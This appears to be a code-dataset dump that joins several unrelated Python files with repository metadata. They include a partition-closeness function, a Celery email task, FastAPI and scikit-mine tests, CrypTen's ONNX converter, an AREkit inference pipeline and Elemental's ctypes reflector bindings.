>>> evaluation.partition_closeness_simple(louvain_communities,leiden_communities)
:Reference:
1. Dao, Vinh-Loc, Cécile Bothorel, and Philippe Lenca. "Estimating the similarity of community detection methods based on cluster size distribution." International Conference on Complex Networks and their Applications. Springer, Cham, 2018.
"""
coms_a = sorted(list(set([len(c) for c in first_partition.communities])))
freq_a = defaultdict(int)
for a in coms_a:
freq_a[a] += 1
freq_a = [freq_a[a] for a in sorted(freq_a)]
n_a = sum([coms_a[i] * freq_a[i] for i in range(0, len(coms_a))])
coms_b = sorted(list(set([len(c) for c in second_partition.communities])))
freq_b = defaultdict(int)
for b in coms_b:
freq_b[b] += 1
freq_b = [freq_b[b] for b in sorted(freq_b)]
n_b = sum([coms_b[i] * freq_b[i] for i in range(0, len(coms_b))])
closeness = 0
for i in range(0, len(coms_a)):
for j in range(0, len(coms_b)):
if coms_a[i] == coms_b[j]:
closeness += min(
(coms_a[i] * freq_a[i]) / n_a, (coms_b[j] * freq_b[j]) / n_b
)
closeness *= 0.5
return MatchingResult(score=closeness)
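# Hypothetical usage sketch: any objects exposing a `communities` attribute can be
# compared here; as the docstring says, the score only looks at the distributions of
# community sizes, not at which nodes the communities actually contain.
def _toy_partition_closeness():
    _Toy = namedtuple("_Toy", "communities")
    a = _Toy(communities=[[0, 1], [2, 3, 4]])
    b = _Toy(communities=[[0, 3], [1, 2, 4]])
    return partition_closeness_simple(a, b).score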
| 36.263969
| 391
| 0.692684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 11,522
| 0.612156
|
3bef530282cd351acc8d5d5fce296f7123e0bfe8
| 56
|
py
|
Python
|
node/views/__init__.py
|
mohamedmansor/path-detector
|
14954795ea47109d404b54f74575337f86d6134f
|
[
"MIT"
] | null | null | null |
node/views/__init__.py
|
mohamedmansor/path-detector
|
14954795ea47109d404b54f74575337f86d6134f
|
[
"MIT"
] | null | null | null |
node/views/__init__.py
|
mohamedmansor/path-detector
|
14954795ea47109d404b54f74575337f86d6134f
|
[
"MIT"
] | null | null | null |
from .node_view import ConnectNodesViewSet, PathViewSet
| 28
| 55
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3bf1bbdf44b6a8b3ce4f31f26290f905b3426047
| 1,193
|
py
|
Python
|
tests/modules/extra/fastapi/controller/integration/test_fastapi_app_with_controller.py
|
alice-biometrics/petisco
|
b96e697cc875f67a28e60b4fc0d9ed9fc646cd86
|
[
"MIT"
] | 19
|
2019-11-01T09:27:17.000Z
|
2021-12-15T10:52:31.000Z
|
tests/modules/extra/fastapi/controller/integration/test_fastapi_app_with_controller.py
|
alice-biometrics/petisco
|
b96e697cc875f67a28e60b4fc0d9ed9fc646cd86
|
[
"MIT"
] | 68
|
2020-01-15T06:55:00.000Z
|
2022-02-22T15:57:24.000Z
|
tests/modules/extra/fastapi/controller/integration/test_fastapi_app_with_controller.py
|
alice-biometrics/petisco
|
b96e697cc875f67a28e60b4fc0d9ed9fc646cd86
|
[
"MIT"
] | 2
|
2019-11-19T10:40:25.000Z
|
2019-11-28T07:12:07.000Z
|
from typing import Optional
import pytest
from fastapi import FastAPI, Header
from fastapi.testclient import TestClient
from meiga import BoolResult, Failure, isFailure, isSuccess
from petisco import NotFound, assert_http
from petisco.extra.fastapi import FastAPIController
app = FastAPI(title="test-app")
result_from_expected_behavior = {
"success": isSuccess,
"failure_generic": isFailure,
"failure_not_found": Failure(NotFound()),
}
class MyController(FastAPIController):
def execute(self, expected_behavior: str) -> BoolResult:
return result_from_expected_behavior.get(expected_behavior, isSuccess)
@app.get("/test")
def entry_point(x_behavior: Optional[str] = Header("success")):
return MyController().execute(x_behavior)
@pytest.mark.unit
@pytest.mark.parametrize(
"behavior,expected_status_code",
[("success", 200), ("failure_generic", 500), ("failure_not_found", 404)],
)
def test_fastapi_app_with_controller_should_return_expected_values(
behavior, expected_status_code
):
with TestClient(app) as client:
response = client.get("/test", headers={"x-behavior": behavior})
assert_http(response, expected_status_code)
| 29.097561
| 78
| 0.75943
| 178
| 0.149204
| 0
| 0
| 554
| 0.464376
| 0
| 0
| 166
| 0.139145
|
3bf3ea019e2b8d99252bef80157556503f118e91
| 438
|
py
|
Python
|
component/reminder/tasks.py
|
pablo0723/just-a-test
|
31e8157a5d1f50b30d83d945b77caaa2b7b717ba
|
[
"MIT"
] | null | null | null |
component/reminder/tasks.py
|
pablo0723/just-a-test
|
31e8157a5d1f50b30d83d945b77caaa2b7b717ba
|
[
"MIT"
] | null | null | null |
component/reminder/tasks.py
|
pablo0723/just-a-test
|
31e8157a5d1f50b30d83d945b77caaa2b7b717ba
|
[
"MIT"
] | null | null | null |
from django.core.mail import send_mail
from component.reminder.models import Reminder
from server.celery import app
@app.task
def send_email(id):
reminder = Reminder.objects.filter(id=id).first()
if reminder is not None:
send_mail(subject="ReminderMessage",
message=reminder.text,
from_email='no-reply@test.com',
recipient_list=[reminder.email]
)
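# Hypothetical usage sketch (not part of this module): schedule the task so the
# e-mail goes out at the reminder's due time. `remind_at` is an assumed datetime
# field on Reminder; apply_async/eta is standard Celery API, and the broker is
# expected to be configured in server.celery.
def schedule_reminder(reminder):
    return send_email.apply_async(args=[reminder.id], eta=reminder.remind_at)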
| 27.375
| 53
| 0.636986
| 0
| 0
| 0
| 0
| 318
| 0.726027
| 0
| 0
| 36
| 0.082192
|
3bf45f24ab2dd0e2ee1d2a8a4c89e7d8442c50d9
| 1,203
|
py
|
Python
|
skmine/tests/test_base.py
|
remiadon/scikit-mine
|
769d7d5ea0dda5d4adea33236733f4ce1ea0c815
|
[
"BSD-3-Clause"
] | null | null | null |
skmine/tests/test_base.py
|
remiadon/scikit-mine
|
769d7d5ea0dda5d4adea33236733f4ce1ea0c815
|
[
"BSD-3-Clause"
] | null | null | null |
skmine/tests/test_base.py
|
remiadon/scikit-mine
|
769d7d5ea0dda5d4adea33236733f4ce1ea0c815
|
[
"BSD-3-Clause"
] | null | null | null |
import pandas as pd
import pytest
from ..base import BaseMiner, MDLOptimizer
def test_inst_params():
class MyMiner(BaseMiner):
def __init__(self, eps=3):
self.eps = eps
self._a = 2
def fit(self, D):
self._a = 12
kwargs = dict(eps=4)
miner = MyMiner(**kwargs)
assert miner.get_params() == kwargs
kwargs.update(eps=10)
miner.set_params(**kwargs)
assert miner.get_params() == kwargs
assert miner.set_params().get_params() == kwargs # stay untouched
with pytest.raises(ValueError):
miner.set_params(random_key=2)
def test_inst_params_no_init():
class MyMiner(BaseMiner):
def fit(self, D, y=None):
return self
miner = MyMiner()
assert miner.get_params() == dict()
def test_mdl_repr():
class A(MDLOptimizer):
def __init__(self):
self.codetable_ = {1: [0, 1], 2: [1]}
def fit(self):
return self
def evaluate(self):
return True
def generate_candidates(self):
return list()
a = A()
assert isinstance(a._repr_html_(), str)
assert isinstance(a.fit()._repr_html_(), str)
| 20.741379
| 70
| 0.591022
| 513
| 0.426434
| 0
| 0
| 0
| 0
| 0
| 0
| 16
| 0.0133
|
3bf5e5434eef73539dca4c83819a0c06da30de79
| 893
|
py
|
Python
|
src/season/data/websrc/modules/intro/controller/index.py
|
season-framework/season-flask-wiz
|
95d75758a6036d387c1b803bd6a68f238ec430e0
|
[
"MIT"
] | 6
|
2021-12-09T05:06:49.000Z
|
2022-01-18T02:38:03.000Z
|
src/season/data/websrc/modules/intro/controller/index.py
|
season-framework/season-flask-wiz
|
95d75758a6036d387c1b803bd6a68f238ec430e0
|
[
"MIT"
] | 2
|
2022-02-18T02:00:36.000Z
|
2022-03-22T05:18:30.000Z
|
src/season/data/websrc/modules/intro/controller/index.py
|
season-framework/season-flask-wiz
|
95d75758a6036d387c1b803bd6a68f238ec430e0
|
[
"MIT"
] | 2
|
2022-01-07T00:26:00.000Z
|
2022-03-07T06:24:27.000Z
|
import season
import random
class Controller(season.interfaces.controller.base):
def __init__(self, framework):
super().__init__(framework)
def __default__(self, framework):
return self.redirect('list')
def list(self, framework):
data = []
for i in range(20):
data.append({
'id': 'item-' + str(i+1),
'title' :'Title #{}'.format(i+1),
'value1': random.randint(0, 1000),
'value2': random.randint(0, 1000),
'value3': random.randint(0, 10000) / 100
})
return framework.response.render('list.pug', data=data)
def item(self, framework):
message = framework.model('data').getMessage()
itemid = framework.request.segment.get(0, True)
return framework.response.render('item.pug', id=itemid, message=message)
| 33.074074
| 80
| 0.571109
| 864
| 0.967525
| 0
| 0
| 0
| 0
| 0
| 0
| 85
| 0.095185
|
3bf63b37e1c270fbc81e663a1141ad00744d52eb
| 11,770
|
py
|
Python
|
crypten/nn/onnx_converter.py
|
chenfar/CrypTen
|
9a11b79f1fa9d707eb38abf7d812911980520559
|
[
"MIT"
] | null | null | null |
crypten/nn/onnx_converter.py
|
chenfar/CrypTen
|
9a11b79f1fa9d707eb38abf7d812911980520559
|
[
"MIT"
] | null | null | null |
crypten/nn/onnx_converter.py
|
chenfar/CrypTen
|
9a11b79f1fa9d707eb38abf7d812911980520559
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import copy
import io
import onnx
import torch
import torch.onnx.symbolic_helper as sym_help
import torch.onnx.symbolic_registry as sym_registry
import torch.onnx.utils
from onnx import numpy_helper
from torch.onnx import OperatorExportTypes
from . import module
try:
import tensorflow as tf # noqa
import tf2onnx
TF_AND_TF2ONNX = True
except ImportError:
TF_AND_TF2ONNX = False
def from_onnx(onnx_string_or_file):
"""
Converts an ONNX model serialized in an `onnx_string_or_file` to a CrypTen model.
"""
onnx_model = _load_onnx_model(onnx_string_or_file)
return _to_crypten(onnx_model)
def from_pytorch(pytorch_model, dummy_input):
"""
Converts a PyTorch model `pytorch_model` into a CrypTen model by tracing it
using the input `dummy_input`.
"""
# construct CrypTen model:
f = _from_pytorch_to_bytes(pytorch_model, dummy_input)
crypten_model = from_onnx(f)
f.close()
# set model architecture to export model back to pytorch model
crypten_model.pytorch_model = copy.deepcopy(pytorch_model)
# make sure training / eval setting is copied:
crypten_model.train(mode=pytorch_model.training)
return crypten_model
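# Hypothetical usage sketch (kept inside a function so nothing runs at import time):
# trace a tiny PyTorch module and convert it. The layer sizes and the dummy input
# shape are arbitrary; the only requirement is that the dummy input matches the
# model's forward signature.
def _from_pytorch_example():
    pytorch_model = torch.nn.Sequential(torch.nn.Linear(4, 2), torch.nn.ReLU())
    dummy_input = torch.randn(1, 4)
    return from_pytorch(pytorch_model, dummy_input)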
def from_tensorflow(tensorflow_graph_def, inputs, outputs):
"""
Function that converts Tensorflow model into CrypTen model based on
https://github.com/onnx/tensorflow-onnx/blob/master/tf2onnx/convert.py
The model is returned in evaluation mode.
Args:
`tensorflow_graph_def`: Input Tensorflow GraphDef to be converted
`inputs`: input nodes
`outputs`: output nodes
"""
raise DeprecationWarning(
"crypten.nn.from_tensorflow is deprecated. ",
"CrypTen will no longer support model conversion from TensorFlow.",
)
# Exporting model to ONNX graph
if not TF_AND_TF2ONNX:
raise ImportError("Please install both tensorflow and tf2onnx packages")
with tf.Graph().as_default() as tf_graph:
tf.import_graph_def(tensorflow_graph_def, name="")
with tf2onnx.tf_loader.tf_session(graph=tf_graph):
g = tf2onnx.tfonnx.process_tf_graph(
tf_graph,
opset=10,
continue_on_error=False,
input_names=inputs,
output_names=outputs,
)
onnx_graph = tf2onnx.optimizer.optimize_graph(g)
model_proto = onnx_graph.make_model(
"converted from {}".format(tensorflow_graph_def)
)
f = io.BytesIO()
f.write(model_proto.SerializeToString())
# construct CrypTen model
# Note: We don't convert crypten model to training mode, as Tensorflow
# models are used for both training and evaluation without the specific
# conversion of one mode to another
f.seek(0)
crypten_model = from_onnx(f)
return crypten_model
def _from_pytorch_to_bytes(pytorch_model, dummy_input):
"""
Returns I/O stream containing ONNX graph for `pytorch_model` traced with
input `dummy_input`.
"""
# first export is only used to obtain the PyTorch-to-ONNX symbolic registry:
with io.BytesIO() as f:
_export_pytorch_model(f, pytorch_model, dummy_input)
# update ONNX symbolic registry with CrypTen-specific functions:
_update_onnx_symbolic_registry()
# export again so the graph is created with CrypTen-specific registry:
f = io.BytesIO()
f = _export_pytorch_model(f, pytorch_model, dummy_input)
f.seek(0)
return f
def _export_pytorch_model(f, pytorch_model, dummy_input):
"""
Returns a binary I/O stream containing ONNX-exported pytorch_model that was
traced with input `dummy_input`.
"""
kwargs = {
"do_constant_folding": False,
"export_params": True,
"enable_onnx_checker": True,
"input_names": ["input"],
"operator_export_type": OperatorExportTypes.ONNX,
"output_names": ["output"],
}
torch.onnx.export(pytorch_model, dummy_input, f, **kwargs)
return f
# mapping from ONNX to crypten.nn for modules with different names:
ONNX_TO_CRYPTEN = {
"adaptive_avg_pool2d": module.AdaptiveAvgPool2d,
"adaptive_max_pool2d": module.AdaptiveMaxPool2d,
"AveragePool": module.AvgPool2d,
"Clip": module.Hardtanh,
"MaxPool": module.MaxPool2d,
"Pad": module._ConstantPad,
"Relu": module.ReLU,
"ReduceMean": module.Mean,
"ReduceSum": module.Sum,
}
def _to_crypten(onnx_model):
"""
Function that converts an `onnx_model` to a CrypTen model.
"""
# create graph:
input_names, output_names = _get_input_output_names(onnx_model)
assert len(output_names) == 1, "Only one output per model supported."
crypten_model = module.Graph(input_names, output_names[0])
# create nodes for the parameters:
for node in onnx_model.graph.initializer:
param = torch.from_numpy(numpy_helper.to_array(node))
crypten_model.add_module(node.name, module.Parameter(param), [])
# loop over all nodes:
for node in onnx_model.graph.node:
# get attributes and node type:
attributes = {attr.name: _get_attribute_value(attr) for attr in node.attribute}
crypten_class = _get_operator_class(node.op_type, attributes)
# add CrypTen module to graph:
crypten_module = crypten_class.from_onnx(attributes=attributes)
input_names = list(node.input)
output_names = list(node.output)
if node.op_type == "Dropout":
output_names = [output_names[0]] # do not output Dropout mask
crypten_model.add_module(
output_names[0], crypten_module, input_names, output_names=output_names
)
# return final model:
crypten_model = _get_model_or_module(crypten_model)
return crypten_model
def _load_onnx_model(onnx_string_or_file):
"""
Loads ONNX model from file or string.
"""
if hasattr(onnx_string_or_file, "seek"):
onnx_string_or_file.seek(0)
return onnx.load(onnx_string_or_file)
return onnx.load_model_from_string(onnx_string_or_file)
def _get_input_output_names(onnx_model):
"""
Return input and output names of the ONNX graph.
"""
input_names = [input.name for input in onnx_model.graph.input]
output_names = [output.name for output in onnx_model.graph.output]
assert len(input_names) >= 1, "number of inputs should be at least 1"
assert len(output_names) == 1, "number of outputs should be 1"
return input_names, output_names
def _get_model_or_module(crypten_model):
"""
Returns `Module` if model contains only one module. Otherwise returns model.
"""
num_modules = len(list(crypten_model.modules()))
if num_modules == 1:
for crypten_module in crypten_model.modules():
return crypten_module
return crypten_model
def _get_attribute_value(attr):
"""
Retrieves value from an ONNX attribute.
"""
if attr.HasField("f"): # floating-point attribute
return attr.f
elif attr.HasField("i"): # integer attribute
return attr.i
elif attr.HasField("s"): # string attribute
return attr.s # TODO: Sanitize string.
elif attr.HasField("t"): # tensor attribute
return torch.from_numpy(numpy_helper.to_array(attr.t))
elif len(attr.ints) > 0:
return list(attr.ints)
elif len(attr.floats) > 0:
return list(attr.floats)
raise ValueError("Unknown attribute type for attribute %s." % attr.name)
def _get_operator_class(node_op_type, attributes):
"""
Returns the `crypten.nn.Module` type corresponding to an ONNX node.
"""
crypten_class = getattr(
module, node_op_type, ONNX_TO_CRYPTEN.get(node_op_type, None)
)
if crypten_class is None:
raise ValueError(f"CrypTen does not support ONNX op {node_op_type}.")
return crypten_class
def _update_onnx_symbolic_registry():
"""
Updates the ONNX symbolic registry for operators that need a CrypTen-specific
implementation and custom operators.
"""
# update PyTorch's symbolic ONNX registry to output different functions:
for version_key, version_val in sym_registry._registry.items():
for function_key in version_val.keys():
if function_key == "softmax":
sym_registry._registry[version_key][
function_key
] = _onnx_crypten_softmax
if function_key == "log_softmax":
sym_registry._registry[version_key][
function_key
] = _onnx_crypten_logsoftmax
if function_key == "dropout":
sym_registry._registry[version_key][
function_key
] = _onnx_crypten_dropout
if function_key == "feature_dropout":
sym_registry._registry[version_key][
function_key
] = _onnx_crypten_feature_dropout
@sym_help.parse_args("v", "i", "none")
def _onnx_crypten_softmax(g, input, dim, dtype=None):
"""
This function converts PyTorch's Softmax module to a Softmax module in
the ONNX model. It overrides PyTorch's default conversion of Softmax module
to a sequence of Exp, ReduceSum and Div modules, since this default
conversion can cause numerical overflow when applied to CrypTensors.
"""
result = g.op("Softmax", input, axis_i=dim)
if dtype and dtype.node().kind() != "prim::Constant":
parsed_dtype = sym_help._get_const(dtype, "i", "dtype")
result = g.op("Cast", result, to_i=sym_help.scalar_type_to_onnx[parsed_dtype])
return result
@sym_help.parse_args("v", "i", "none")
def _onnx_crypten_logsoftmax(g, input, dim, dtype=None):
"""
This function converts PyTorch's LogSoftmax module to a LogSoftmax module in
the ONNX model. It overrides PyTorch's default conversion of LogSoftmax module
to avoid potentially creating Transpose operators.
"""
result = g.op("LogSoftmax", input, axis_i=dim)
if dtype and dtype.node().kind() != "prim::Constant":
parsed_dtype = sym_help._get_const(dtype, "i", "dtype")
result = g.op("Cast", result, to_i=sym_help.scalar_type_to_onnx[parsed_dtype])
return result
@sym_help.parse_args("v", "f", "i")
def _onnx_crypten_dropout(g, input, p, train):
"""
This function converts PyTorch's Dropout module to a Dropout module in the ONNX
model. It overrides PyTorch's default implementation to ignore the Dropout module
during the conversion. PyTorch assumes that ONNX models are only used for
inference and therefore Dropout modules are not required in the ONNX model.
However, CrypTen needs to convert ONNX models to trainable
CrypTen models, and so the Dropout module needs to be included in the
CrypTen-specific conversion.
"""
r, _ = g.op("Dropout", input, ratio_f=p, outputs=2)
return r
@sym_help.parse_args("v", "f", "i")
def _onnx_crypten_feature_dropout(g, input, p, train):
"""
This function converts PyTorch's DropoutNd module to a DropoutNd module in the ONNX
model. It overrides PyTorch's default implementation to ignore the DropoutNd module
during the conversion. PyTorch assumes that ONNX models are only used for
inference and therefore DropoutNd modules are not required in the ONNX model.
However, CrypTen needs to convert ONNX models to trainable
CrypTen models, and so the DropoutNd module needs to be included in the
CrypTen-specific conversion.
"""
r, _ = g.op("DropoutNd", input, ratio_f=p, outputs=2)
return r
| 34.925816
| 87
| 0.693203
| 0
| 0
| 0
| 0
| 2,641
| 0.224384
| 0
| 0
| 4,972
| 0.42243
|
3bf70a1a9f2bab5e2d13cf95f5bb6e7cbc23fec9
| 3,582
|
py
|
Python
|
examples/pipeline.py
|
nicolay-r/AREk
|
19c39ec0dc9a17464cade03b9c4da0c6d1d21191
|
[
"MIT"
] | null | null | null |
examples/pipeline.py
|
nicolay-r/AREk
|
19c39ec0dc9a17464cade03b9c4da0c6d1d21191
|
[
"MIT"
] | null | null | null |
examples/pipeline.py
|
nicolay-r/AREk
|
19c39ec0dc9a17464cade03b9c4da0c6d1d21191
|
[
"MIT"
] | null | null | null |
from arekit.common.data.input.providers.label.multiple import MultipleLabelProvider
from arekit.common.data.row_ids.multiple import MultipleIDProvider
from arekit.common.data.storages.base import BaseRowsStorage
from arekit.common.data.views.samples import BaseSampleStorageView
from arekit.common.experiment.data_type import DataType
from arekit.common.labels.scaler import BaseLabelScaler
from arekit.contrib.experiment_rusentrel.labels.scalers.three import ThreeLabelScaler
from arekit.contrib.networks.context.architectures.pcnn import PiecewiseCNN
from arekit.contrib.networks.context.configurations.cnn import CNNConfig
from arekit.contrib.networks.core.ctx_inference import InferenceContext
from arekit.contrib.networks.core.feeding.bags.collection.single import SingleBagsCollection
from arekit.contrib.networks.core.input.helper_embedding import EmbeddingHelper
from arekit.contrib.networks.core.model import BaseTensorflowModel
from arekit.contrib.networks.core.model_io import NeuralNetworkModelIO
from arekit.contrib.networks.core.predict.provider import BasePredictProvider
from arekit.contrib.networks.core.predict.tsv_writer import TsvPredictWriter
from arekit.contrib.networks.shapes import NetworkInputShapes
from examples.input import EXAMPLES
from examples.repository import pipeline_serialize
def pipeline_infer(labels_scaler):
assert(isinstance(labels_scaler, BaseLabelScaler))
# Step 4. Deserialize data
network = PiecewiseCNN()
config = CNNConfig()
config.set_term_embedding(EmbeddingHelper.load_vocab("embedding.txt"))
inference_ctx = InferenceContext.create_empty()
inference_ctx.initialize(
dtypes=[DataType.Test],
create_samples_view_func=lambda data_type: BaseSampleStorageView(
storage=BaseRowsStorage.from_tsv("samples.txt"),
row_ids_provider=MultipleIDProvider()),
has_model_predefined_state=True,
vocab=EmbeddingHelper.load_vocab("vocab.txt"),
labels_count=3,
input_shapes=NetworkInputShapes(iter_pairs=[
(NetworkInputShapes.FRAMES_PER_CONTEXT, config.FramesPerContext),
(NetworkInputShapes.TERMS_PER_CONTEXT, config.TermsPerContext),
(NetworkInputShapes.SYNONYMS_PER_CONTEXT, config.SynonymsPerContext),
]),
bag_size=config.BagSize)
# Step 5. Model preparation.
model = BaseTensorflowModel(
nn_io=NeuralNetworkModelIO(
target_dir=".model",
full_model_name="PCNN",
model_name_tag="_"),
network=network,
config=config,
inference_ctx=inference_ctx,
        bags_collection_type=SingleBagsCollection,  # Use a single sample per input bag.
)
model.predict()
# Step 6. Gather annotated contexts onto document level.
labeled_samples = model.get_labeled_samples_collection(data_type=DataType.Test)
predict_provider = BasePredictProvider()
# TODO. For now it is limited to tsv.
with TsvPredictWriter(filepath="out.txt") as out:
title, contents_it = predict_provider.provide(
sample_id_with_uint_labels_iter=labeled_samples.iter_non_duplicated_labeled_sample_row_ids(),
labels_scaler=labels_scaler)
out.write(title=title,
contents_it=contents_it)
if __name__ == '__main__':
text = EXAMPLES["simple"]
labels_scaler = ThreeLabelScaler()
label_provider = MultipleLabelProvider(label_scaler=labels_scaler)
pipeline_serialize(sentences_text_list=text, label_provider=label_provider)
pipeline_infer(labels_scaler)
| 40.704545
| 105
| 0.769961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 282
| 0.078246
|
3bf77e53ccae2099f5deb07947c3ee02b77cf7b8
| 9,038
|
py
|
Python
|
python/lapack_like/reflect.py
|
justusc/Elemental
|
145ccb28411f3f0c65ca30ecea776df33297e4ff
|
[
"BSD-3-Clause"
] | null | null | null |
python/lapack_like/reflect.py
|
justusc/Elemental
|
145ccb28411f3f0c65ca30ecea776df33297e4ff
|
[
"BSD-3-Clause"
] | null | null | null |
python/lapack_like/reflect.py
|
justusc/Elemental
|
145ccb28411f3f0c65ca30ecea776df33297e4ff
|
[
"BSD-3-Clause"
] | null | null | null |
#
# Copyright (c) 2009-2015, Jack Poulson
# All rights reserved.
#
# This file is part of Elemental and is under the BSD 2-Clause License,
# which can be found in the LICENSE file in the root directory, or at
# http://opensource.org/licenses/BSD-2-Clause
#
from ..core import *
import ctypes
# Apply packed reflectors
# =======================
lib.ElApplyPackedReflectors_s.argtypes = \
lib.ElApplyPackedReflectors_d.argtypes = \
lib.ElApplyPackedReflectors_c.argtypes = \
lib.ElApplyPackedReflectors_z.argtypes = \
lib.ElApplyPackedReflectorsDist_s.argtypes = \
lib.ElApplyPackedReflectorsDist_d.argtypes = \
lib.ElApplyPackedReflectorsDist_c.argtypes = \
lib.ElApplyPackedReflectorsDist_z.argtypes = \
[c_uint,c_uint,c_uint,c_uint,iType,c_void_p,c_void_p,c_void_p]
def ApplyPackedReflectors(side,uplo,dir,order,offset,H,t,A):
if type(H) is not type(t) or type(t) is not type(A):
raise Exception('Matrix types of {H,t,A} must match')
if H.tag != t.tag or t.tag != A.tag:
raise Exception('Datatypes of {H,t,A} must match')
args = [side,uplo,dir,order,offset,H.obj,t.obj,A.obj]
if type(H) is Matrix:
if H.tag == sTag: lib.ElApplyPackedReflectors_s(*args)
elif H.tag == dTag: lib.ElApplyPackedReflectors_d(*args)
elif H.tag == cTag: lib.ElApplyPackedReflectors_c(*args)
elif H.tag == zTag: lib.ElApplyPackedReflectors_z(*args)
else: DataExcept()
elif type(H) is DistMatrix:
if H.tag == sTag: lib.ElApplyPackedReflectorsDist_s(*args)
elif H.tag == dTag: lib.ElApplyPackedReflectorsDist_d(*args)
elif H.tag == cTag: lib.ElApplyPackedReflectorsDist_c(*args)
elif H.tag == zTag: lib.ElApplyPackedReflectorsDist_z(*args)
else: DataExcept()
else: TypeExcept()
# Expand packed reflectors
# ========================
lib.ElExpandPackedReflectors_s.argtypes = \
lib.ElExpandPackedReflectors_d.argtypes = \
lib.ElExpandPackedReflectors_c.argtypes = \
lib.ElExpandPackedReflectors_z.argtypes = \
lib.ElExpandPackedReflectorsDist_s.argtypes = \
lib.ElExpandPackedReflectorsDist_d.argtypes = \
lib.ElExpandPackedReflectorsDist_c.argtypes = \
lib.ElExpandPackedReflectorsDist_z.argtypes = \
[c_uint,c_uint,iType,c_void_p,c_void_p]
def ExpandPackedReflectors(uplo,dir,offset,H,t):
if type(H) is not type(t):
raise Exception('Types of H and t must match')
if H.tag != t.tag:
raise Exception('Datatypes of H and t must match')
args = [uplo,dir,offset,H.obj,t.obj]
if type(H) is Matrix:
if H.tag == sTag: lib.ElExpandPackedReflectors_s(*args)
elif H.tag == dTag: lib.ElExpandPackedReflectors_d(*args)
elif H.tag == cTag: lib.ElExpandPackedReflectors_c(*args)
elif H.tag == zTag: lib.ElExpandPackedReflectors_z(*args)
else: DataExcept()
elif type(H) is DistMatrix:
if H.tag == sTag: lib.ElExpandPackedReflectorsDist_s(*args)
elif H.tag == dTag: lib.ElExpandPackedReflectorsDist_d(*args)
elif H.tag == cTag: lib.ElExpandPackedReflectorsDist_c(*args)
elif H.tag == zTag: lib.ElExpandPackedReflectorsDist_z(*args)
else: DataExcept()
else: TypeExcept()
# Hyperbolic reflector
# ====================
# Left application
# ----------------
lib.ElLeftHyperbolicReflector_s.argtypes = \
[POINTER(sType),c_void_p,POINTER(sType)]
lib.ElLeftHyperbolicReflector_d.argtypes = \
[POINTER(dType),c_void_p,POINTER(dType)]
lib.ElLeftHyperbolicReflector_c.argtypes = \
[POINTER(cType),c_void_p,POINTER(cType)]
lib.ElLeftHyperbolicReflector_z.argtypes = \
[POINTER(zType),c_void_p,POINTER(zType)]
lib.ElLeftHyperbolicReflectorDist_s.argtypes = \
[POINTER(sType),c_void_p,POINTER(sType)]
lib.ElLeftHyperbolicReflectorDist_d.argtypes = \
[POINTER(dType),c_void_p,POINTER(dType)]
lib.ElLeftHyperbolicReflectorDist_c.argtypes = \
[POINTER(cType),c_void_p,POINTER(cType)]
lib.ElLeftHyperbolicReflectorDist_z.argtypes = \
[POINTER(zType),c_void_p,POINTER(zType)]
def LeftHyperbolicReflector(chi,x):
alpha = TagToType(x.tag)(chi)
tau = TagToType(x.tag)()
args = [pointer(alpha),x.obj,pointer(tau)]
if type(x) is Matrix:
if x.tag == sTag: lib.ElLeftHyperbolicReflector_s(*args)
elif x.tag == dTag: lib.ElLeftHyperbolicReflector_d(*args)
elif x.tag == cTag: lib.ElLeftHyperbolicReflector_c(*args)
elif x.tag == zTag: lib.ElLeftHyperbolicReflector_z(*args)
else: DataExcept()
elif type(x) is DistMatrix:
if x.tag == sTag: lib.ElLeftHyperbolicReflectorDist_s(*args)
elif x.tag == dTag: lib.ElLeftHyperbolicReflectorDist_d(*args)
elif x.tag == cTag: lib.ElLeftHyperbolicReflectorDist_c(*args)
elif x.tag == zTag: lib.ElLeftHyperbolicReflectorDist_z(*args)
else: DataExcept()
else: TypeExcept()
return alpha, tau
# Right application
# -----------------
lib.ElRightHyperbolicReflector_s.argtypes = \
[POINTER(sType),c_void_p,POINTER(sType)]
lib.ElRightHyperbolicReflector_d.argtypes = \
[POINTER(dType),c_void_p,POINTER(dType)]
lib.ElRightHyperbolicReflector_c.argtypes = \
[POINTER(cType),c_void_p,POINTER(cType)]
lib.ElRightHyperbolicReflector_z.argtypes = \
[POINTER(zType),c_void_p,POINTER(zType)]
lib.ElRightHyperbolicReflectorDist_s.argtypes = \
[POINTER(sType),c_void_p,POINTER(sType)]
lib.ElRightHyperbolicReflectorDist_d.argtypes = \
[POINTER(dType),c_void_p,POINTER(dType)]
lib.ElRightHyperbolicReflectorDist_c.argtypes = \
[POINTER(cType),c_void_p,POINTER(cType)]
lib.ElRightHyperbolicReflectorDist_z.argtypes = \
[POINTER(zType),c_void_p,POINTER(zType)]
def RightHyperbolicReflector(chi,x):
alpha = TagToType(x.tag)(chi)
tau = TagToType(x.tag)()
args = [pointer(alpha),x.obj,pointer(tau)]
if type(x) is Matrix:
if x.tag == sTag: lib.ElRightHyperbolicReflector_s(*args)
elif x.tag == dTag: lib.ElRightHyperbolicReflector_d(*args)
elif x.tag == cTag: lib.ElRightHyperbolicReflector_c(*args)
elif x.tag == zTag: lib.ElRightHyperbolicReflector_z(*args)
else: DataExcept()
elif type(x) is DistMatrix:
if x.tag == sTag: lib.ElRightHyperbolicReflectorDist_s(*args)
elif x.tag == dTag: lib.ElRightHyperbolicReflectorDist_d(*args)
elif x.tag == cTag: lib.ElRightHyperbolicReflectorDist_c(*args)
elif x.tag == zTag: lib.ElRightHyperbolicReflectorDist_z(*args)
else: DataExcept()
else: TypeExcept()
return alpha, tau
# Householder reflector
# =====================
# Left application
# ----------------
lib.ElLeftReflector_s.argtypes = [POINTER(sType),c_void_p,POINTER(sType)]
lib.ElLeftReflector_d.argtypes = [POINTER(dType),c_void_p,POINTER(dType)]
lib.ElLeftReflector_c.argtypes = [POINTER(cType),c_void_p,POINTER(cType)]
lib.ElLeftReflector_z.argtypes = [POINTER(zType),c_void_p,POINTER(zType)]
lib.ElLeftReflectorDist_s.argtypes = [POINTER(sType),c_void_p,POINTER(sType)]
lib.ElLeftReflectorDist_d.argtypes = [POINTER(dType),c_void_p,POINTER(dType)]
lib.ElLeftReflectorDist_c.argtypes = [POINTER(cType),c_void_p,POINTER(cType)]
